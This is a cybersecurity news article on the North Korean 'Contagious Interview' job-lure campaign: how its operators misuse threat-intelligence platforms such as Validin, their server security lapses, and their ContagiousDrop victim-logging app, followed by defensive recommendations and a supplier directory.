North Korean Hackers Exploit Cyber Intelligence Platforms to Evade Detection

Uploaded on 2025-09-06 in NEWS-Cybersecurity News, INTELLIGENCE-Hot Spots-North Korea, FREE TO VIEW

In a revealing joint research effort, SentinelLabs and internet intelligence platform Validin have uncovered how North Korean threat actors are re-purposing defensive cyber tools to monitor and refine their malicious operations.

Released on 8 September 2025, the report details the "Contagious Interview" campaign, where Democratic People's Republic of Korea (DPRK)-aligned hackers use social engineering tactics to target job seekers in the cryptocurrency and blockchain sectors.

By abusing cyber threat intelligence (CTI) platforms, these actors detect exposure, explore and map new infrastructures, and sustain campaigns despite disruptions.

The findings highlight a sophisticated, team-based approach that prioritises rapid adaptation over comprehensive overhauls, impacting at least 230 victims between January and March 2025 - though the true figure is likely far higher.

Evolution Of The Contagious Interview Campaign

The Contagious Interview cluster, linked to the broader Lazarus group, has evolved into a persistent threat targeting professionals in high-value industries. According to the report, these actors impersonate legitimate companies like Archblock, Robinhood, and eToro, luring victims with fake job offers for roles such as Portfolio Manager or Senior Product Manager.

Victims, primarily in marketing and finance within cryptocurrency and blockchain firms, are geographically dispersed worldwide.

The campaign employs the ClickFix social engineering technique, where targets are tricked into executing commands that download malware disguised as software updates or utilities. This malware is tailored to the victim's operating system - Windows, macOS, or Linux architecture. The report notes that engagement spans multiple stages, from completing phony skill assessments to initiating malware downloads via tools like curl commands.

SentinelLabs and Validin observed this activity intensifying after Validin's 11 March 2025 blog post on Lazarus infrastructure. Within 24 hours, threat actors registered multiple Validin community accounts using tracked Gmail addresses, such as info@versusx.us. Although most were blocked, one was deliberately left active for monitoring, revealing coordinated efforts across teams.

Abusing CTI Platforms For Operational Resilience

A key revelation is how DPRK actors repurpose CTI platforms - intended for defenders - to their advantage. Platforms like Validin, VirusTotal, and Maltrail are used to query infrastructure artifacts, detecting signs of exposure. The report describes real-time collaboration, with indicators suggesting use of Slack for coordinating investigations.

Despite identifying detectable artifacts, the actors implement only sporadic, limited changes. For instance, they might alter specific domain names or server configurations but avoid large-scale modifications. Instead, they focus on rapidly deploying new infrastructure following takedowns by service providers.

This strategy reflects a pragmatic approach: maintaining operational tempo amid high victim engagement rates.

The report attributes this to internal factors within North Korea's cyber operations. Decentralised command structures and resource constraints limit coordinated updates. Moreover, annual revenue quotas imposed by the regime foster competition among teams, incentivising operatives to protect their own assets rather than collaborate on broad changes. As a result, actors prioritise replacing disrupted infrastructure to meet targets and sustain revenue generation through stolen cryptocurrencies.

OPSEC Failures In Infrastructure Management

Threat actors also use CTI platforms to evaluate potential new assets before acquisition. On 25 March 2025, the monitored account queried domains like hiringassessment.net and skillquestions.com—names aligning with recruitment themes - shortly before registration. This scouting aims to avoid flagged malicious assets, reducing detection risks post-deployment. Monitoring continues throughout the asset's lifecycle, with periodic checks until takedown.

However, the report exposes significant operational security (OPSEC) lapses during deployment.

Servers like api.release-drivers.online inadvertently exposed web root directories, Node.js error logs, and usernames such as relefmwz, revealing deployment timelines. Other servers, including api.camdriverhelp.club and api.drive-release.cloud, leaked ContagiousDrop applications and victim logs, providing unintended insights into operations.

The Role of ContagiousDrop In Tracking Victims

Central to the campaign is ContagiousDrop, a Node.js application (app.js) deployed on malware distribution servers. It handles HTTP requests, delivering OS-specific payloads while logging interactions. Features include an email notification system, sending alerts from addresses like designedcuratedamy58@gmail.com when victims engage - such as starting assessments or downloading files.

Logs build a detailed victim database, recording names, emails, IP addresses, phone numbers, and interaction dates in files like client_ips_start_test.json. Analysis of these logs from January to March 2025 identified over 230 engagements, though limited to a few servers. Victims' profiles confirm targeting of crypto experts, with logs also showing internal testing using aliases like Richard Davis and Lazaro - likely referencing Lazarus.

Defensive Recommendations

The report demonstrates how attackers are using defenders' tools against them, challenging the cybersecurity community to adapt. DPRK groups, including ScarCruft, have shown prior interest in CTI, even developing malware to target researchers in 2024. This abuse reveals operational plans, enabling better tracking despite expected adaptations.

To counter this, organisations should scrutinise job offers, verify communications, and implement robust endpoint security. CTI providers must enhance account verification and monitor suspicious queries.

The report advocates sharing intelligence to empower defences, outweighing the risks of alerting actors. As North Korean cyber threats escalate, collaborative efforts like this joint investigation are crucial for disrupting campaigns and protecting vulnerable sectors.

This research not only exposes DPRK tactics but calls for heightened vigilance in an era where intelligence tools are double-edged swords.

SentinelOne  |   Infosecurity Magazine  |   IBM/XForce  |  Security Week  |   gbhackers  |  CyberSixt  

Image: Ideogram

You Might Also Read: 

NimDoor: North Korea’s Latest Cyber Exploit Targets Crypto:

If you like this website and use the comprehensive 8,000-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible

« Typhoon In The Fifth Domain: China's Evolving Cyber Strategy

ManageEngine
CyberSecurity Jobsite
Check Point
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

Tines

Tines

The Tines security automation platform helps security teams automate manual tasks, making them more effective and efficient.

CYRIN

CYRIN

CYRIN® Cyber Range. Real Tools, Real Attacks, Real Scenarios. See why leading educational institutions and companies in the U.S. have begun to adopt the CYRIN® system.

Practice Labs

Practice Labs

Practice Labs is an IT competency hub, where live-lab environments give access to real equipment for hands-on practice of essential cybersecurity skills.

Jooble

Jooble

Jooble is a job search aggregator operating in 71 countries worldwide. We simplify the job search process by displaying active job ads from major job boards and career sites across the internet.

Syxsense

Syxsense

Syxsense brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams.

Centre for International Governance Innovation (CIGI)

Centre for International Governance Innovation (CIGI)

CIGI research areas include Conflict Management & Security which encompass cyber security and cyber warfare.

Auth0

Auth0

Auth0 is a cloud service that provides a set of unified APIs and tools that instantly enables single sign-on and user management for any application, API or IoT device.

Vicarius

Vicarius

Vicarius’ mission is to revolutionize vulnerability management from problem detection to proactive problem resolution.

FinCom.co

FinCom.co

FinCom.Co is the world’s first automatic AML/ KYC screening system, for comprehensive compliance.

Inavate Consulting

Inavate Consulting

Inavate Consulting are experts in defining and implementing information assurance solutions and governance frameworks. Our ISO27001 consultants are the most experienced in the industry.

Fischer Identity

Fischer Identity

Fischer Identity provide identity & access management and identity governance administration solutions.

Sergeant Laboratories

Sergeant Laboratories

Sergeant Laboratories builds advanced technologies to prove compliance in complex IT security and regulatory compliance situations.

PixelPlex

PixelPlex

PixelPlex is a blockchain and custom software development company with offices and developers in New York, Geneva, and Seoul.

Liquid Intelligent Technologies

Liquid Intelligent Technologies

Liquid Intelligent Technologies is a leading communications solutions provider across Africa, providing reliable connectivity, hosting, co-location, and digital services including cyber security.

Forever Group

Forever Group

Forever Group is a Managed Services Provider specialising in Telecommunications, IT Support, and Cyber Security.

SecurityGen

SecurityGen

SecurityGen is a global cybersecurity start-up focused on telecom security, with a focus on 5G networks.

Intuitive Research & Technology Corp

Intuitive Research & Technology Corp

Intuitive Research and Technology is an aerospace engineering and analysis firm providing services to the Department of Defense, government agencies, and commercial companies.

FluidOne

FluidOne

FluidOne are an award-winning Connected Cloud Solutions provider. We design tailored solutions to help customers and partners digitally transform their IT and communications.

Applied Connective Technologies

Applied Connective Technologies

Applied Connective is one team for all your technology needs, from IT to phones, cyber security to physical security, audio/video and the infrastructure to support it.

Xact IT Solutions

Xact IT Solutions

Xact IT Solutions are a certified cybersecurity firm offering cybersecurity, compliance and managed services.

DarkHorse Security

DarkHorse Security

DarkHorse exists to make it easy and affordable for organizations to be able to identify their cybersecurity vulnerabilities.